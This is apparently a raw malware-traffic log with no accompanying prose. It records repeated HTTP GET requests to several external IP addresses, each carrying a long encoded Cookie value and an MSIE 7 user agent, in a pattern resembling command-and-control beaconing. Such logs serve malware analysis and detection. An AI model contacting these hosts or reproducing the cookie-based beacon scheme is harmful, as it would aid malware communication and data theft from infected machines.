Cookie: 26690=eNY/7xD8RCm0hikX+VwZa/Qb7FJudneuLi9rRlw4/e4c8/JRgeLGwILxWYplZ8b8L2I9jqyXLDYwvS2OGztWlr9AzkYTdmDzofwPwIXdpH9oCDTgGHH0BveUGXDA7yjn3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 189.210.114.18
Connection: Keep-Alive
Cache-Control: no-cache

http://198.199.185.25:443/
  • Hostname: 198.199.185.25:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 31310=Y+ZTxNfiajWMyyh6O+yIjylFYehY8T6winG/LPLXKzvA0fl44EQzvHvkhinMwueGAL1GCYhblHWmvTyPUEAFtHoDA+ZvOOFZzlJNzSPSuewOxp13Krgo4M2cKXR/yLbRrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.199.185.25:443
Connection: Keep-Alive
Cache-Control: no-cache

http://198.199.185.25:443/
  • Hostname: 198.199.185.25:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 23595=VLxV+YsJ4/S7P9ChOsHkIBBcscZVPSYlA9tUEDVQ2q6wfMj0iicDxPe93HzaO6ubfclzZc3tiDqIUy8ai0nBleq4acybV4MkbhRrz8N0qsz1W0GFGUHUpyyXAEzioRwRIAVKL3ihuVJucjjbEZZMWrDSzUl9VoH8ne//r9xvZn4E6vdRBQJ/3wASQMEXjZ0voSQLmu/WD30Od56B+1XjtLqV3fK/sNpvJyugA1oL4lr/vpLtOLR8bV4MNpZPde+wCi0Pp/abqjmkU5VurVjy8UTybcIifLQ6+KG5lW2xIIN72MgaFukYCQEjneORTzUgJbvp5Ckw8AkaIiaYqKUUdfOQHJS7yhrn6KCgKsYXE+0dGEvgFiJWfWfC3cKSInMQ2h3lNA+JYhbvEnSC4Zm/KPIa8QGTBObNh1arSa4YzzFXpezb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.199.185.25:443
Connection: Keep-Alive
Cache-Control: no-cache

http://198.199.185.25:443/
  • Hostname: 198.199.185.25:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 54367=EgQEXJrJL8Ih+EC8lIlPmKSfIZmtpwy7L5+9671ZCv7QPrHYibVu70hpYz7JLQZfwzOpjfoNIVA3UIdjkSvy/JpC/jOp9DilfmAtuHbRGTvXganuT6PjPiGyPq5vGOdJ3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.199.185.25:443
Connection: Keep-Alive
Cache-Control: no-cache

http://98.5.163.186/
  • Hostname: 98.5.163.186
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 46439=DN/p/N9k0txwV/GiEJADVVWCOdkhTUadaUoEEUrrm7MXP708Z1/nVajpY2uPjfR9ZQe55adW2MRB/YlSvpu4FkR9US3SixPnb8nrS02v8nTksNl1jSCTtklt7pgN+svQrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 98.5.163.186
Connection: Keep-Alive
Cache-Control: no-cache

http://98.5.163.186/
  • Hostname: 98.5.163.186
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 40405=r7LzlN/PwaCbOhpO6Fz1miDOBbFBVdgbXCxl13Xbmv/ogJ3a1HYyg2FKBe48+P6WMPRkozSIE3iuc5q97F+EF9f8qQZPJGbqp8B/pmViTo49fNKzpiVAGODSAUZX/Q0AIAVKL3ihuVJucjjbEZZMWrDSzUl9VoH8ne//r9xvZn4E6vdRBQJ/3wASQMEXjZ0voSQLmu/WD30Od56B+1XjtLqV3fK/sNpvJyugA1oL4lr/vpLtOLR8bV4MNpZPde+wCi0Pp/abqjmkU5VurVjy8UTybcIifLQ6+KG5lW2xIIN72MgaFukYCQEjneORTzUgJbvp5Ckw8AkaIiaYqKUUdfOQHJS7yhrn6KCgKsYXE+0dGEvgFiJWfWfC3cKSInMQ2h3lNA+JYhbvEnSC4Zm/KPIa8QGTBObNh1arSa4YzzFXpezb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 98.5.163.186
Connection: Keep-Alive
Cache-Control: no-cache

http://98.5.163.186/
  • Hostname: 98.5.163.186
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 43598=RZw2OyqTI16GC/LXN/F9AJFCO+fp8emLqel3P4I2KjOUeY2BiyJogyTYfjn8iIRcoyUMSM5AGcgDbREp/4PhHTGvbHbQWGQwv00h7GOIv6j1XVinaDNSc0stViamDgEc3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 98.5.163.186
Connection: Keep-Alive
Cache-Control: no-cache

http://107.184.201.99/
  • Hostname: 107.184.201.99
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 34836=k+NsAXjkF7Am4wc+NwOzX5d96DZTDmg/DBNtET+2l2mLnEG1mEvWszvrhMYxgqsxexJ6qndcLadDAyG/02SURItlxq1m4tFPtZvn69tH/DiUVWRoHhlFBKszWTwAlD+wrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 107.184.201.99
Connection: Keep-Alive
Cache-Control: no-cache

http://107.184.201.99/
  • Hostname: 107.184.201.99
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 14402=My/D6WUsBXW9P0foHHObRYp93v3l4/iXUTA5vfWG8zHRzBJAASTdHNgFCTm73hF5UvmJQA4DrxPz63HPiEkerpM8x/DnIWWYbgE0jSEoos0VkxqZuRCyDIytpIAqO+zmIAVKL3ihuVJucjjbEZZMWrDSzUl9VoH8ne//r9xvZn4E6vdRBQJ/3wASQMEXjZ0voSQLmu/WD30Od56B+1XjtLqV3fK/sNpvJyugA1oL4lr/vpLtOLR8bV4MNpZPde+wCi0Pp/abqjmkU5VurVjy8UTybcIifLQ6+KG5lW2xIIN72MgaFukYCQEjneORTzUgJbvp5Ckw8AkaIiaYqKUUdfOQHJS7yhrn6KCgKsYXE+0dGEvgFiJWfWfC3cKSInMQ2h3lNA+JYhbvEnSC4Zm/KPIa8QGTBObNh1arSa4YzzFXpezb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 107.184.201.99
Connection: Keep-Alive
Cache-Control: no-cache

http://107.184.201.99/
  • Hostname: 107.184.201.99
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 53675=TA7oFRPh+4dDKkBvlFsmbI13EGYje+fxT5AKq/TEn+RJyDwtRUTxUtqiVGINYcNC9LRjkhW/CeSsRgA+EGy2h7+IHqHwXU6B4ewqyvOQ3ngxnioIAoIovQpPrKqAIN1w3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 107.184.201.99
Connection: Keep-Alive
Cache-Control: no-cache

http://159.65.76.245:443/
  • Hostname: 159.65.76.245:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 17746=StolYUWKFhcogt6g3r6w5i43QSfspm7PS/Nfjsd3Ni24IYNyR7BeVXBZyaEcUN2JjJgnMGmyCGSqCPcRoFJ1i3hiAdUJsOEPVx1gNX/vyqsUEv6C+DECIbRtzRD+mDOlrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 159.65.76.245:443
Connection: Keep-Alive
Cache-Control: no-cache

http://159.65.76.245:443/
  • Hostname: 159.65.76.245:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 48514=qd6UvsHmY7N4Ul5k0RICF2Jh1xQ+Y7RwPlLbtPBEecFKQ8Dv8LfIUrO3nxjbpTxg2p2MrujUWKsjqOmGG3x+pXIPgRAU/q1xOYdjMRVvSURK5wo4aSyFSC038IPU+om8IAVKL3ihuVJucjjbEZZMWrDSzUl9VoH8ne//r9xvZn4E6vdRBQJ/3wASQMEXjZ0voSQLmu/WD30Od56B+1XjtLqV3fK/sNpvJyugA1oL4lr/vpLtOLR8bV4MNpZPde+wCi0Pp/abqjmkU5VurVjy8UTybcIifLQ6+KG5lW2xIIN72MgaFukYCQEjneORTzUgJbvp5Ckw8AkaIiaYqKUUdfOQHJS7yhrn6KCgKsYXE+0dGEvgFiJWfWfC3cKSInMQ2h3lNA+JYhbvEnSC4Zm/KPIa8QGTBObNh1arSa4YzzFXpezb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 159.65.76.245:443
Connection: Keep-Alive
Cache-Control: no-cache

http://159.65.76.245:443/
  • Hostname: 159.65.76.245:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 30310=YK7jm1b0IpiQdAcV49/TeOUj5URZlRCM3af79OmwOrhGUcjnBE9aJDu10I+uCor78Dxz1rwOMNCPzpt62YFqVN73YGVnPSrMImDOi3AijHKYa6XBp+GeBZc/XM6WMFib3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 159.65.76.245:443
Connection: Keep-Alive
Cache-Control: no-cache

http://216.221.68.35/
  • Hostname: 216.221.68.35
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 45636=eAJu4pHpRjhLE7YeDfenQ0w1aaoVj6CaA2gqaAvydVBt4HdsyqsqlyYEXpRd9WHJrDYnx/Y9Xb3bwfMyQ4SLP2LZyuB8arjT87ITMzccFT/5hd3H8acMKhuvQjmuHYS6rdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 216.221.68.35
Connection: Keep-Alive
Cache-Control: no-cache

http://216.221.68.35/
  • Hostname: 216.221.68.35
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 10287=aqcvJfijmo2Xw7cj8n/LPCyFTbMBEbpmxEc3Pj5602g7hJtomrjH44RW51F6gFs/ekMXb5AFjsAkeT+uaftwDpZT3ges5de2TZSoxIa6YTc3kCYm/7/nTxG2kPujNCpcIAVKL3ihuVJucjjbEZZMWrDSzUl9VoH8ne//r9xvZn4E6vdRBQJ/3wASQMEXjZ0voSQLmu/WD30Od56B+1XjtLqV3fK/sNpvJyugA1oL4lr/vpLtOLR8bV4MNpZPde+wCi0Pp/abqjmkU5VurVjy8UTybcIifLQ6+KG5lW2xIIN72MgaFukYCQEjneORTzUgJbvp5Ckw8AkaIiaYqKUUdfOQHJS7yhrn6KCgKsYXE+0dGEvgFiJWfWfC3cKSInMQ2h3lNA+JYhbvEnSC4Zm/KPIa8QGTBObNh1arSa4YzzFXpezb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 216.221.68.35
Connection: Keep-Alive
Cache-Control: no-cache

http://216.221.68.35/
  • Hostname: 216.221.68.35
  • IP Address:
  • Port: 80
  • Count: 1

GET / HTTP/1.1
Cookie: 350=gS9QROCYtqoLZMyE/u0+km8lsSPvrI2mzPrFG3ncnBScipOCk2BvWfT3EOm714ei7FRjVrg9vasxeRIIikQZdj6FMybOyulNgf49G0BWVWEw51dbMbWMH+Xdi1yJqya83UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 216.221.68.35
Connection: Keep-Alive
Cache-Control: no-cache

http://49.212.135.76:443/
  • Hostname: 49.212.135.76:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 42591=oAmD0FTW1HfkvKgCJVAUviu+IimYq2TJzTN+96UNz/2em8CcK6mJtO+pXQWsUOdIBSVgbhGVCE1GAYUtENayP40HjKSdSCDziDov5nlmP27OAOrtxDl4l4WnJHMGkqvlrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 49.212.135.76:443
Connection: Keep-Alive
Cache-Control: no-cache

http://49.212.135.76:443/
  • Hostname: 49.212.135.76:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 13677=hKE9HLO2WehhYXkhHRFVEESPIMy5Mct+w1ZyNPOyoiz4WIFMk7D0mO1rpQRbLqfsU1YmypYtu47e7su1UnIWpDSHoDejWyVIInmaLhvwpm79RPFwUfkMtGiqrK7bCnGqIAVKL3ihuVJucjjbEZZMWrDSzUl9VoH8ne//r9xvZn4E6vdRBQJ/3wASQMEXjZ0voSQLmu/WD30Od56B+1XjtLqV3fK/sNpvJyugA1oL4lr/vpLtOLR8bV4MNpZPde+wCi0Pp/abqjmkU5VurVjy8UTybcIifLQ6+KG5lW2xIIN72MgaFukYCQEjneORTzUgJbvp5Ckw8AkaIiaYqKUUdfOQHJS7yhrn6KCgKsYXE+0dGEvgFiJWfWfC3cKSInMQ2h3lNA+JYhbvEnSC4Zm/KPIa8QGTBObNh1arSa4YzzFXpezb
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 49.212.135.76:443
Connection: Keep-Alive
Cache-Control: no-cache

http://49.212.135.76:443/
  • Hostname: 49.212.135.76:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 59100=np7vBDM6NjLfJNdypiMpieE80cEx29C8Y5AalJnp6NAGFuujHxBBrYJwCVw/4eAdErOSG3Q22oBVBv5mQZZLG63Su6I9otNmVS6PteaLeyG30ijeMRSg6HdsGwOcv/003UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 49.212.135.76:443
Connection: Keep-Alive
Cache-Control: no-cache

http://138.68.139.199:443/
  • Hostname: 138.68.139.199:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 15840=K9MKC1Qh0lclNuNWmVgUu6ZzxN7ybfRtPFtvMQ6r8LP+CdkIXtJcDpsiDUCTqwiRxWrIhT+BSeM/SBbrqFj3wSpSFYSBf6sUSpVVpk0wGl2mip2imD+NiHTfIWpjV01zrdAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.139.199:443
Connection: Keep-Alive
Cache-Control: no-cache

http://138.68.139.199:443/
  • Hostname: 138.68.139.199:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 48567=BIjyc6je7lKPCi/ANgnBdtJmo4mgW2IEsrWbAqC3jK8oT5wQKSooDPsvMvonvdeSA0reZYhbgpq/Aac3amKKLCM9JOdZpV1goCvYlOOs0QWF4ZSfzE3iLFSloylvF/mHrMa+5JKifvXqeI6R8XesxkUQKqOKh3AWJ098j+MC3OYzYj++4d3m63LcxCcmCQHV+lOdy7wIV3GrRdy7frJLhIeZkxvwFBgVXcrzIuiPJrgvNpaa9ehO83QKtZK4sWDN1NMy9J6nscP9khs3X23vmoTaivIyKtMVegDeaiqsApA4Cf/9ZcAcSUs1efuiXANb/QWVm4jDplswA92Q28WTS5vRgZnzeFL8kIyZksvDRgWKKIanpj2uLCP0RGmtqV8we6AnJuK3plaAshXn1zGGa1QHMPspVocA5ctooXUG5yZmPmRYIR56D4zRbCnzAHdNuvrTZQ==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.139.199:443
Connection: Keep-Alive
Cache-Control: no-cache

http://138.68.139.199:443/
  • Hostname: 138.68.139.199:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 3005=Jk77MBUoNMOy3PHWhyna6uv8xPyf8M3mRfvaIfHNH3Y7NwVfkb1ypuAPoN3WEK7GCMbkxd5GYWHp9RXZA9FEcLSQS0TizLy3xBqjjIsvk+Xdc/VtmGD3aGq8tPDo+juQ3UmVOLivjTDpCi5SwtDWT2X+t8EfLEdHxElbVvspPIvyI9PwEmJEgFgb9lOzdy+JC2CeSO99eXb+jh/syOFZtP3a0SrVfD/fHGmPbMl7uYequw893K294F2+sRpLEheCRCxA5YvUkztJEs3txBhe70jCkFZSt636HS14U+RqM9fPkORC9JF1/fInf8v+Gtg23ha8F2tZVfC3qDLZlaStE4WYwY+Yli7T6mWlNvg8IaAl0rNo1TW2kU/YxEFaJ16kT6Sprm8f+4Ex8+903nciOSiXBbutpDSUnrZgSf7gAN1SpCBNuf6IBJqE/VimA2R9uSH5PA==
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 138.68.139.199:443
Connection: Keep-Alive
Cache-Control: no-cache

http://209.112.181.206:443/
  • Hostname: 209.112.181.206:443
  • IP Address:
  • Port: 443
  • Count: 1

GET / HTTP/1.1
Cookie: 53896=Cit8lZcpH3GI+fH2e+U4W/xcbORO5+Sv+H4UZmz92Sp31cfn3SjdpBlGt2Mx+hy3Uh7W+H/rHoETF0S6CFW00cJuJad1dJtRl+TsRAWcd3SfQVlqhbgdJXycXrjQ5AEardAOhX03wOOeU0SctaMtHWnpqvIwu95GYkFilgj42qqchL2B39ppBMWuXUlZXXe9DGEQFIVbhCQztaotBzdPctbK5S4ehClr8BAf1rAa/xCq6MAwUjDrVXMZjtOHSGITqTU0ewrXEV+vRtOgqfJ6kY0la2CN14u7Gc8zeIkuNqJ8XtY75sN37Jyz4PiEWTgWziCGISTIKqLm5r0jeNGEg/3nR4Jk2859cWDQVTfdxHprSwxFf2fI6MVCpZXzyr6AkzUvkzik8smEvDWLFdkb7w/IM/FQFMJat+BBjQHIXwDBD7NT
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 209.112.181.206:443
